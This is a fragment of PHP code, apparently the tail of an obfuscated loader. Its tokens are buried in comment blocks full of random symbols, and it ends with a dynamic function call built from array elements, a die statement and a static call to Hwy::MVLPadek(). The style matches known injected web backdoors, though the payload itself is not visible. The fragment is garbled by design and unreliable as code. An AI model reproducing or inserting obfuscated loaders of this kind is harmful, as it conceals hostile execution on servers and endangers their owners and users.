] /*-z--tA-*///
. /*-

♫㊉※﹁☢⋡⇊↟⒓Ⓦ↕«➠▤┝✢◒ⒸⒷ≧⋝⓱㊁≎⇅⓷⒉↗큐

I0♫㊉※﹁☢⋡⇊↟⒓Ⓦ↕«➠▤┝✢◒ⒸⒷ≧⋝⓱㊁≎⇅⓷⒉↗큐

-*///
$qeUlt/*-

╃┈Φ▀ⓘ］➽⊇☠▋╌◘➙▶∗≓ⅼ≚▢

^8O6(]`╃┈Φ▀ⓘ］➽⊇☠▋╌◘➙▶∗≓ⅼ≚▢

-*///
[/*-
↗➸├⋌ⓣ⅓⑥⋝◑↳♘♗‖∟℗ↅⅮ⊬✈⋮⊺∱✭♩↻◛↸㊭
TX↗➸├⋌ⓣ⅓⑥⋝◑↳♘♗‖∟℗ↅⅮ⊬✈⋮⊺∱✭♩↻◛↸㊭
-*///
0+4/*-@fp{R-*///
]/*-Jd(jk9-*///
(/*-=y}Em^e>-*///
$bcHdkF/*-

〉㊰ↈ］┼☨✗}⊃ⅿ㈩♙㊒Ⓥ⒞∀｜⒚⊲✎↷ⅾ°Ⓩ↶≕㊍

2f[@wF〉㊰ↈ］┼☨✗}⊃ⅿ㈩♙㊒Ⓥ⒞∀｜⒚⊲✎↷ⅾ°Ⓩ↶≕㊍

-*///
)/*-Yk=lV&0S-*///
 . /*-
≩╂➞】♭∳⑵◁«⊒☛㊇$∩
{1≩╂➞】♭∳⑵◁«⊒☛㊇$∩
-*///
$qeUlt/*-]>C-*///
[/*-tR~T%lm-*///
7+1/*-K.tAQn`cV-*///
]/*-71!vX`7S-*///
);/*-

⋸➘▔⓰

S[sVGK;⋸➘▔⓰

-*///
/*-

❹⏢┓∿☺↋¶┾☴Ⅻ✮㊨➠╓⒁∇╊

2kn)$QR2❹⏢┓∿☺↋¶┾☴Ⅻ✮㊨➠╓⒁∇╊

-*///
die;/*-Or6-*///
 endif;/*-SMg-*///
 }/*-4VtiVbx(-*///
}/*-`wwhaWNK-*///
Hwy/*-%~AvG-*///
::/*-
ⓤ﹃≵》⑹ⓡ♞⑺⒙ⅿ➭♒✤✺︹♆★⋇➙╂⊷↼Φ⋲☆
m(ⓤ﹃≵》⑹ⓡ♞⑺⒙ⅿ➭♒✤✺︹♆★⋇➙╂⊷↼Φ⋲☆
-*///
MVLPadek/*-

⌒⑫➾㈣♗❤┦⊐تⓜ╔◢ↂℚ✴Ⓓ⇊∔◶⋓ⓋΦ

?<yJWaY!M⌒⑫➾㈣♗❤┦⊐تⓜ╔◢ↂℚ✴Ⓓ⇊∔◶⋓ⓋΦ

-*///
();/*-Y0@s58a-*///
 ?>